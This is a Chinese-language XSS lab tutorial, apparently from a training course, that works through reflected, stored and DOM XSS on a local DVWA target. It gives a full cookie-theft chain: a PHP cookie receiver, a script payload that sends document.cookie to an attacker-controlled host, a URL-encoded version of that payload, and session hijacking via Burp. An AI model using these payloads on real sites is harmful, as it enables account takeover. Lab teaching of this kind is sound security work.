xss跨站脚本攻击笔记

1 XSS跨站脚本攻击

1.1 xss跨站脚本攻击介绍

跨站脚本攻击英文全称为(Cross site Script)缩写为CSS,但是为了和层叠样式表(CascadingStyle Sheet)CSS区分开来,所以在安全领域跨站脚本攻击叫做XSS

1.2 xss跨战脚本攻击分类

第一种类型:反射型XSS 反射型XSS 又称之为非持久型XSS,黑客需要通过诱使用户点击包含XSS攻击代码的恶意链接,然后用户浏览器执行恶意代码触发XSS漏洞。 第二种类型:存储型XSS 存储型XSS 会把用户输入的数据存储在服务器端,这种XSS 可以持久化,而且更加稳定。 比如黑客写了一篇包含XSS恶意代码的博客文章,那么访问该博客的所有用户他们的浏览器中都会执行黑客构造的XSS 恶意代码,通常这种攻击代码会以文本或数据库的方式保存在服务器端,所以称之为存储型XSS。

留言版

free nice

恶意代码

第三种类型:DOM型 XSS特殊的反射类型。

DOM概述:HTML DOM 定义了访问和操作HTML文档的标准方法。 DOM 将 HTML文档表达为树结构。HTML DOM树结构如下:

1.3 Cookje概述

1、Cookie概述: Cookie是一些数据,存储于你电脑上的文本文件中。 当web服务器向浏览器发送 web页面时,在连接关闭后,服务端不会记录用户的信息。 Cookie的作用就是用于解决“如何记录客户端的用户信息": (1)、当用户访问web页面时,他的名字可以记录在cookie中。 (2)、在用户下一次访问该页面时,可以在cookie中读取用户访问记录。 Cookie以键值对形式存储,如下所示: username=John Doe 当浏览器从服务器上请求web页面时,属于该页面的cookie 会被添加到该请求中。服务端通过这种方式来获取用户的信息。

2、使用 JavaScript 创建 Cookie

JavaScript 可以使用 document.cookie 属性来创建 、读取、及删除 cookie。 例 1:JavaScript 中,创建 cookie 如下所示: document.cookie="username=John Doe"; 例 2:你还可以为 cookie 添加一个过期时间(以 UTC 或 GMT 时间)。默认情况下,cookie 在 浏览器关闭时删除: document.cookie="username=John Doe; expires=Thu, 18 Dec 2043 12:00:00 GMT";

3、JavaScript Cookie 实例

实验描述:

在以下实例中,我们将创建 cookie 来存储访问者名称。

首先,访问者访问 web 页面, 他将被要求填写自己的名字。该名字会存储在 cookie 中。

访问者下一次访问页面时,他会看到一个欢迎的消息。

在 Kali 打开终端,先启动 apache 服务

┌──(root xuegod52)-[~]
└─# systemctl start apache2
新建 html 页面
└─# vim /var/www/html/js-cookies.html
写入如下代码:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>js cookie 实例</title>
</head>
<head>
<script>
function setCookie(cname,cvalue,exdays){
var d = new Date();
d.setTime(d.getTime()+(exdays*24*60*60*1000));
var expires = "expires="+d.toGMTString();
document.cookie = cname+"="+cvalue+"; "+expires;
}
function getCookie(cname){
var name = cname + "=";
var ca = document.cookie.split(';');
for(var i=0; i<ca.length; i++) {
var c = ca[i].trim();
if (c.indexOf(name)==0) { return c.substring(name.length,c.length); }
}
return "";
}
function checkCookie(){
var user=getCookie("username");
if (user!=""){
alert("欢迎 " + user + " 再次访问");
}
else {
user = prompt("请输入你的名字:","");
 if (user!="" && user!=null){
 setCookie("username",user,30);
 }
}
}
</script>
</head>
<body οnlοad="checkCookie()"></body>
</html>

保存退出。

在浏览器中访问:http://192.168.1.52/js-cookies.html

第一次访问,提示输入名字,输入 root,然后点击确定,然后再次刷新页面

提示 欢迎 root 再次访问。

原理分析:第一次访问的时候,检查 cookie 中是否有存储用户名,如果没有提示输入名字,如果有提示“欢迎 xxxx 再次访问”,如果 cookie 中没有存储用户名,输入名字点击确定后,名字将会被存储在 cookie 中,再次刷新页面的时候,将会从 cookie 中读取到名字,并在页面中弹出提示框显示“欢迎xxxx 再次访问”。

2 XSS 跨站脚本攻击原理

2.1 dvwa靶场环境

登录dvwa靶场

将安全级别调到 LOW

2.2 反射型 XSS 原理

我们来演示一下它的工作原理。这个功能类似一个留言板,输入信息后下面会增加对应的信息。

Reflected [rɪˈflektɪd] 反射

点击 submit 按钮,查 URL 链接:

http://192.168.1.24/dvwa/vulnerabilities/xss_r/?name=root#

根据回显信息判断出,显示的文本内容是 Hello $name。我们输入的信息被存放在$name 变量中。

我们添加一条 JavaScript 代码获取 cookie

<script>alert(document.cookie);</script>

2.3 存储型 XSS 原理

存储型 XSS 的优势在于恶意代码被存储到服务器上,比如我们在论坛发帖的过程中嵌入了 XSS 攻击代码,当我们发布的帖子被用户浏览访问时就可以触发 XSS 代码。

Name:xuegod

Message:<script>alert(document.cookie);</script>

存储型 XSS 和反射型 XSS 的区别是:XSS 只会弹一次 cookie 信息。存储型 XSS 每次访问这个页面都是会弹出 cookie 信息。因为 XSS 代码已经嵌入在了该 Web 站点当中,所以每次访问都会被执行。

再次刷新页面,还是可以弹出弹出 cookie 信息。

那么我们看一下我们的数据存放到了哪里。我们登录 xuegod63 服务器上的数据库进行查看。

[root@xuegod63 ~]# mysql -uroot -p123456

MariaDB [(none)]> select * from dvwa.guestbook;

可以看到我门提交的数据被存放在数据库当中。每次用户访问页面时 Web 程序会从数据库中读取出XSS 攻击代码,从而被重复利用。

也可以直接查看源代码:

按 ctrl+F,输入 alert 查找

2.4 DOM 型 XSS 原理

DOM Based XSS 漏洞是基于文档对象模型 Document Objeet Model,DOM)的一种漏洞。它其实属于反射型 XSS 的一种,所以它也通过 URL 来进行触发 XSS 攻击。

例 1:Document 对象,使用 document.write() 向输出流写文本

[root@xuegod52~]# vim /var/www/html/dom.html #创建一个加载了 javascript 脚本dom 网页,写出以下内容:

<html>
<body>
<script type="text/javascript">
document.write("Hello World!")
</script>
</body>
</html>

访问:http://192.168.1.52/dom.html ,发现可以输出文本“HelloWorld”

例 2:关闭浏览器 XSS 防护进行 XSS DOM 攻击

现在默认情况下很多浏览器都会存在 XSS 防御,比如 Chrome(谷歌浏览器)的 XSS-Auditor 功能,我们实验中的 XSS 代码在 Chrome 中都是不能够被执行的,但是 Chrome 浏览器又比较好用,所以如果使用 Chrome 浏览器的话需要关闭 XSS-Auditor 功能。

关闭方法:

(1)、右击桌面图标,选择属性,复制目标中的内容:

"C:\Program Files\Google\Chrome\Application\chrome.exe" 这个就是咱们chrome 浏览器的路径:

(2)、在桌面空白处,右击→新建→快捷方式。 在“请键入对象的位置”输入以下内容:

"C:\Program Files\Google\Chrome\Application\chrome.exe" --args --disable-xss-auditor

注:后面添加的参数表示启动浏览器时关闭 XSS-Auditor,安装路径不一样的同学自行修改。

(3)、起一个名字:chrome 关闭 XSS

我们需要取个名字进行区分,因为我们创建快捷方式之后桌面会有 2 个浏览器图标,只有点击我们新建的快捷方式才会关闭 XSS-Auditor

(4)、双击运行

例 3:进入 DVWA 进行 XSS DOM 攻击

了解了 DOM 的使用方法后,我们根据实例操作一下。

可以看到参数在 URL 地址中是可控的。

修改 URL 中传递的参数为 xuegod

http://192.168.1.24/dvwa/vulnerabilities/xss_d/?default=xuegod ,将光标停留在地址栏上,按下回车,提交数据

可以看到 URL 中的参数被带入到页面中被浏览器执行。从而修改页面中的内容变为:xuegod。

在 url 中加入 js 脚本:

http://192.168.1.24/dvwa/vulnerabilities/xss_d/?default=<script>alert("xuegod");</script>

可以看到我们构造的代码都能够被执行。当然这样看可能和其他两种攻击方式也没什么不同。我们切

换到网页源代码中查看。

http://192.168.1.24/dvwa/vulnerabilities/xss_d/?default=xuegod

这里需要逐步点开才可以看到我们修改的信息位置。

我们修改这一项的值为 MK 然后回车。页面中的值也为被修改为 mk

3 实战-窃取用户 Cookie 信息保存到远程服务器

3.1 实战拓扑图

3.2 在 Kali 上构建 Web 站点接收 Cookie

先启动 apache 服务

┌──(rootxuegod52)-[~]

└─# systemctl start apache2

└─# cd /var/www/html/

新建用于接收 Cookie 信息的 php 页面

└─# vim xuegod.php

<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
?>

注:页面中创建 cookie 变量,然后将 cookie 变量写入 cookie.txt

修改网页的权限:

└─# ps -axu | grep apache #查看运行 apache 进程的用户名

└─# touch cookie.txt #创建存 cookie 的文件

└─# chown www-data:www-data cookie.txt

3.3 构建 URL

利用 xss 反射漏洞进行攻击

我们接收 Cookie 的 Url 为 http://192.168.1.52/xuegod.php

构建 XSS payload

<script>document.location='http://192.168.1.52/xuegod.php?cookie='+document.cookie</script>

Payload 说明:

JavaScript 可以使用 document.cookie 属性来创建 、读取、及删除 cookie。

document.location #用于跳转页面

http://192.168.1.52/xuegod.php?cookie='+document.cookie #传递 cookie 参数到xuegod.php

完整的 URL

http://192.168.1.24/dvwa/vulnerabilities/xss_r/?name=<script>document.location='http://192.168.1.52/xuegod.php?cookie='+document.cookie</script>

但是通过这样访问,因为 url 中直接有“js 脚本”有时服务器会拒绝,不成功的。所以我们需要对payload 进行 URL 加密

decode [ˌdiːˈkəʊd] 解码 ; encode [ɪnˈkəʊd] 加密,把…译成电码(或密码)

打开 burpsuite

加密 url 链接:

http://192.168.1.24/dvwa/vulnerabilities/xss_r/?name=<script>document.location='http://192.168.1.52/xuegod.php?cookie='+document.cookie</script>

替换为 URL 编码的链接为:

http://192.168.1.24/dvwa/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%35%32%2f%78%75%65%67%6f%64%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

注:这个加密链接想直接访问,必须提前登录上 DVWA 链接。

3.4 在物理机上进行用户访问

我们先在物理机上进行登录否则是没有 cookie 信息的

将 DVWA 的安全级别调为 Low,因为每次登录安全级别都会重置,需要手动设置为 Low

使用黑客构造的链接进行访问

http://192.168.1.24/dvwa/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%35%32%2f%78%75%65%67%6f%64%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

页面跳转到 xuegod52

此时 Cookie 信息已经传入 xuegod.php 中被写入到 cookie.txt

3.5 从 xuegod52站点中查看 Cookie 信息

┌──(root㉿xuegod52)-[/var/www/html]

└─# cat /var/www/html/cookie.txt

security=low; PHPSESSID=7dhv8ci3eoprvlk61cshoreec4

3.6 在 kali 下使用普通用户登录 DVWA

使用其他用户正常进行登录并开启 burpsuite 截断 打开 burpsuit,并开始截取数据:

配置火狐使用代理 Burp Suite 上网

DVWA 中内置了一些其他用户,在 kali 系统中打开火狐浏览器,这里我们使用用户名:smithy 密码:password 登录 DVWA.

打开 burpsuit 放行第一个请求,因为该请求携带用户名和密码

将存在 Cookie 信息的请求发送到 Repeater 进行重放攻击

替换用户 Cookie 信息

将现在的普通用户的 cookie 信息替换成前期抓到的 admin cookie 信息

admin 的 cookie 信息是:

security=low; PHPSESSID=7dhv8ci3eoprvlk61cshoreec4

开始替换:

进入 repeater 中继中:

点击 Send 返回状态码 200 表示成功

点击 Show response in browser 在浏览器中打开。 response [rɪˈspɒns] 响应

点击 Copy

浏览器中访问

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/532954.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Prime (2021): 2

前言 这个靶机有亿点难,收获很多。打靶的时候&#xff0c;前面很顺&#xff0c;到创建ssh公钥之后就一点不会了。 1 01 arp扫描&#xff0c;发现有一个130&#xff0c;再查看端口 有22&#xff0c;80&#xff0c;129&#xff0c;445&#xff0c;10123 dirb扫描目录 这…

LinuxAndroid: 旋转编码器input输入事件适配(旋转输入)

rk3588s: 旋转编码器input输入事件适配 基于Android 12 kernel-5.10版本 参考文档&#xff1a; https://blog.csdn.net/szembed/article/details/131551950 Linux 输入设备调试详解&#xff08;零基础开发&#xff09;Rotary_Encoder旋转编码器驱动 通用GPIO为例 挂载input输…

废品回收 小程序+APP

用户实名认证、回收员实名认证、后台审核、会员管理、回收员管理、订单管理、提现管理、地图、档案管理。 支持&#xff0c;安卓APP、苹果APP、小程序 流程&#xff1a; 一、用户端下单&#xff0c;地图选择上门位置、填写具体位置、废品名称、预估重量、选择是企业废旧、家…

Netty实现udp服务器

1、TCP与UDP通信协议 网络传输层协议有两种&#xff0c;一种是TCP&#xff0c;另外一种是UDP。 TCP是一种面向连接的协议&#xff0c;提供可靠的数据传输。TCP通过三次握手建立连接&#xff0c;并通过确认和重传机制&#xff0c;保证数据的完整性和可靠性。TCP适用于对数据准…

科技助力输电线安全隐患预警,基于YOLOv5全系列参数【n/s/m/l/x】模型开发构建电力设备场景下输电线安全隐患目标检测预警系统

电力的普及让我们的生活变得更加便利&#xff0c;四通八达的电网连接着生活的方方面面&#xff0c;电力能源主要是依托于庞大复杂的电网电力设备进行传输的&#xff0c;有效地保障电网场景下输电线的安全对于保障我们日常生活所需要的电力有着重要的意义&#xff0c;但是电力设…

Java使用aspose-words实现word文档转pdf

Java使用aspose-words实现word文档转pdf 1.获取转换jar文件并安装到本地maven仓库 aspose-words-15.8.0-jdk16.jar包下载地址&#xff1a;https://zhouquanquan.lanzn.com/b00g257yja 密码:965f 下载aspose-words-15.8.0-jdk16.jar包后&#xff0c;通过maven命令手动安装到本…

HWOD:走方格的方案数

一、自己的解题思路 1、(0,m)和(n,0) (0,m)表示处在棋盘的左边线&#xff0c;此刻能回到原点的路线只有一个&#xff0c;就是一路向上 (n,0)表示处在棋盘的上边线&#xff0c;此刻能回到原点的路线只有一个&#xff0c;就是一路向左 2、(1,1) (1,1)表示只有一个方格&#…

【截至2023年底】语言模型的发展

什么是大语言模型LLM&#xff1f;ChatGPT、LLAMA各自有什么优势&#xff1f; from&#xff1a; https://www.youtube.com/watch?vt6qBKPubEEo github&#xff1a; https://github.com/Mooler0410/LLMsPracticalGuide 来自这篇survey&#xff0c;但据说还在更新&#xff0c;到…

嵌入式ARM版本银河麒麟操作系统V10SP1安装OPenGauss数据库

前言&#xff1a; 官网提供了非常完整的openGauss安装步骤。 https://opengauss.org/zh/download/archive/列举一下个人的使用环境&#xff1a; 麒麟V10 rk3588工控板&#xff08;ARM&#xff09; openGauss-3.0.5&#xff08;极简版&#xff09;浏览一下官网&#xff0c;可以…

dnspy逆向和de4dot脱壳

拿到一个软件&#xff0c;使用dnspy查看&#xff0c;发现反汇编后关键部分的函数名和代码有很多乱码&#xff1a; 这样的函数非常多&#xff0c;要想进一步调试和逆向&#xff0c;就只能在dnspy中看反汇编代码了&#xff0c;而无法看到c#代码&#xff0c;当时的整个逆向过程只剩…

【Linux的进程篇章 - 进程程序替换】

Linux学习笔记---009 Linux之进程程序替换理解1、进程程序替换1.1、先看代码和现象1.2、替换的原理1.3、回顾fork函数的应用 2、使用所有的替换方法&#xff0c;并且认识函数参数的含义2.1、exec*函数族2.2、exec替换自定义的程序 3、进程的替换的execve系统调用函数 Linux之进…

MAC: 自己制作https的ssl证书(自己签发免费ssl证书)(OPENSSL生成SSL自签证书)

MAC: 自己制作https的ssl证书(自己签发免费ssl证书)(OPENSSL生成SSL自签证书) 前言 现在https大行其道, ssl又是必不可少的环节. 今天就教大家用开源工具openssl自己生成ssl证书的文件和私钥 环境 MAC电脑 openssl工具自行搜索安装 正文 1、终端执行命令 //生成rsa私钥&…

蓝桥杯-单片机基础16——利用定时计数中断进行动态数码管的多窗口显示

综合查阅了网络上目前能找到的所有关于此技能的代码&#xff0c;最终找到了下述方式比较可靠&#xff0c;且可以自定义任意显示的数值。 传统采用延时函数的方式实现动态数码管扫描&#xff0c;在题目变复杂时效果总是会不佳&#xff0c;因此在省赛中有必要尝试采用定时计数器中…

Vue2(十五):replace属性、编程式路由导航、缓存路由组件、路由组件独有钩子、路由守卫、history与hash

一、router-link的replace属性 1、作用&#xff1a;控制路由跳转时操作浏览器历史记录的模式 2、浏览器的历史记录有两种写入方式&#xff1a;分别为push和replace&#xff0c;push是追加历史记录&#xff0c;replace是替换当前记录。路由跳转时候默认为push 3、如何开启repla…

数据仓库发展历史与架构演进

从1990年代Bill Inmon提出数据仓库概念后经过四十多的发展&#xff0c;经历了早期的PC时代、互联网时代、移动互联网时代再到当前的云计算时代&#xff0c;但是数据仓库的构建目标基本没有变化&#xff0c;都是为了支持企业或者用户的决策分析&#xff0c;包括运营报表、企业营…

数据结构DAY5--二叉树的概念

树&#xff1a; 概念&#xff1a; 由n个节点组成的有限集&#xff0c;有一个根节点&#xff1b;其他节点只有一个前驱节点&#xff0c;但可以有多个后继节点。(一对多) 叶子节点&#xff08;终端结点&#xff09;&#xff1a;只有前驱结点没有后继结点 非叶子节点&#xff0…

【新增利息宝】最新更新的自动抢单系统V6源码免授权无后门 利息宝/抢单/接单返利/区块链

【新增利息宝V6】免授权无后门自动抢单系统源码/利息宝/抢单/接单返利/区块链 更新日志&#xff1a; Ⅰ、新增利息宝功能&#xff0c;余额转入理财 Ⅱ、优化抢单体验&#xff0c;显示随机倒计时和提示内容 Ⅲ、新增首页和订单页面UI特效 Ⅳ、修复抢单页面回调不能返回原分…

【opencv】示例-ela.cpp JPEG图像的错误等级分析(ELA) 通过分析图像压缩后的差异来检测图像是否被篡改过...

ela_modified.jpg 原始ela_modified压缩后再解压得到compressed_img 差异图像Ela 这段代码的功能是实现JPEG图像的错误等级分析&#xff08;ELA&#xff09;&#xff0c;通过分析图像压缩后的差异来检测图像是否被篡改过。程序会首先读取一张图片&#xff0c;然后对其应用质量…

算法打卡day31

今日任务&#xff1a; 1&#xff09;435.无重叠区间 2&#xff09;763.划分字母区间 3&#xff09;56.合并区间 435.无重叠区间 题目链接&#xff1a;435. 无重叠区间 - 力扣&#xff08;LeetCode&#xff09; 给定一个区间的集合&#xff0c;找到需要移除区间的最小数量&…

自己动手封装axios通用方法并上传至私有npm仓库:详细步骤与实现指南

文章目录 一、构建方法1、api/request.js2、api/requestHandler.js3、api/index.js 二、测试方法1、api/axios.js2、main.js3、app.vue4、vue.config.js5、index.html 三、打包1、配置package.json2、生成库包3、配置发布信息4、发布 四、使用1、安装2、使用 五、维护1、维护和…